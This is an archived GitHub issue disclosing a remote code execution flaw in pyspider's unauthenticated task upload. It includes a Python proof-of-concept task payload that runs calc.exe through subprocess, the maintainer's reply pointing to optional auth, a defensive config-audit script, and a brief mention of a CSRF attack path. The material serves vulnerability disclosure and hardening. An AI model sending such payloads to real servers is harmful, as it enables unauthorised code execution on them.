This repository has been archived by the owner on Jun 10, 2024. It is now read-only.

Script content needs security check which could cause RCE #964

Open
lvf233 opened this issue Jan 19, 2021 · 2 comments

Comments


lvf233 commented Jan 19, 2021

🐛 Bug Report

Script content needs security check which could cause RCE

To Reproduce

  1. Start up a pyspider server.
  2. Access the task web page.
  3. Upload a task with a malicious script.
  4. Bingo!

Expected behavior

The server will execute whatever code you set (it ran calc.exe, which I set to prove this vulnerability).

Test script or set of commands reproducing this issue

Post this task as follows to the server.

```python
data = {
'webdav_mode': 'false',
'script':  '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess

def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####  
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}
```

Environment

pyspider v0.3.10
System: Ubuntu 18.04 & Windows 10 version 1909

binux (Owner) commented Jan 19, 2021

Yes, running scripts is fundamental to this project. There's a warning in the README that you can set up auth for the task page.
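The mitigation binux points at (enable auth on the web UI) and the reporter's point that most deployments keep the default configuration can be turned into a small config audit. The following is an added example, not code from the original thread or from pyspider itself. It assumes pyspider's `config.json` layout with a `webui` section carrying `need-auth`, `username`, `password` and `host` keys, mirroring the `pyspider webui` command-line options of the same names; treat those key names and the all-interfaces default as assumptions to be checked against the README of the version you run. Both sample configs are constructed for the example.

```python
"""Audit a pyspider config.json for an unauthenticated, widely exposed web UI.

Added example, not pyspider's own code. Key names ("webui", "need-auth",
"username", "password", "host") are assumed to match the `pyspider webui`
command-line options; verify them against your version's README.
"""
import json

# Constructed sample: the out-of-the-box state the issue describes
# (no auth, listening on all interfaces).
DEFAULT_CONFIG = json.dumps({
    "webui": {"host": "0.0.0.0", "port": 5000}
})

# Constructed sample: the mitigation from the README, written as config.
HARDENED_CONFIG = json.dumps({
    "webui": {
        "host": "127.0.0.1",
        "port": 5000,
        "need-auth": True,
        "username": "admin",
        "password": "use-a-long-random-secret",
    }
})

# Assumption: pyspider's webui binds to all interfaces when no host is given.
ASSUMED_DEFAULT_HOST = "0.0.0.0"
ALL_INTERFACES = ("0.0.0.0", "::", "")


def audit_webui(config_text):
    """Return a list of findings for the webui section; an empty list means OK.

    Findings are strings so the function can drive a CI check or a log line.
    """
    cfg = json.loads(config_text)
    webui = cfg.get("webui", {})
    findings = []

    # Without auth, anyone who can reach the port can submit a script
    # that the server will execute (the behaviour the issue reports).
    if not webui.get("need-auth", False):
        findings.append("webui: need-auth is off; script upload is unauthenticated")
    elif not webui.get("username") or not webui.get("password"):
        findings.append("webui: need-auth is on but username or password is empty")

    # Exposure: an all-interfaces bind widens who can reach the task page.
    host = webui.get("host", ASSUMED_DEFAULT_HOST)
    if host in ALL_INTERFACES:
        findings.append("webui: bound to all interfaces (%r)" % host)

    return findings


if __name__ == "__main__":
    for name, text in (("default", DEFAULT_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_webui(text)
        print("%s config: %s" % (name, result or "no findings"))
```

Run it against a real `config.json` by passing the file's contents to `audit_webui`; a non-empty list is the signal to stop the service from starting. Note that enabling auth addresses unauthenticated access but says nothing about the browser-initiated (CSRF) path the reporter raises later in the thread; that needs separate handling.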

lvf233 (Author) commented Jan 19, 2021

> Yes, running scripts is fundamental to this project. There's a warning in the README that you can set up auth for the task page.

Yeah, most people still start pyspider with the default configuration; could modification of this default setting be forced? Meanwhile, we also designed such a scenario, which works in the case where only localhost is allowed to access it, while supporting JavaScript (using other components for rendering). We use the CSRF method to make requests to the local pyspider to achieve the same effect.
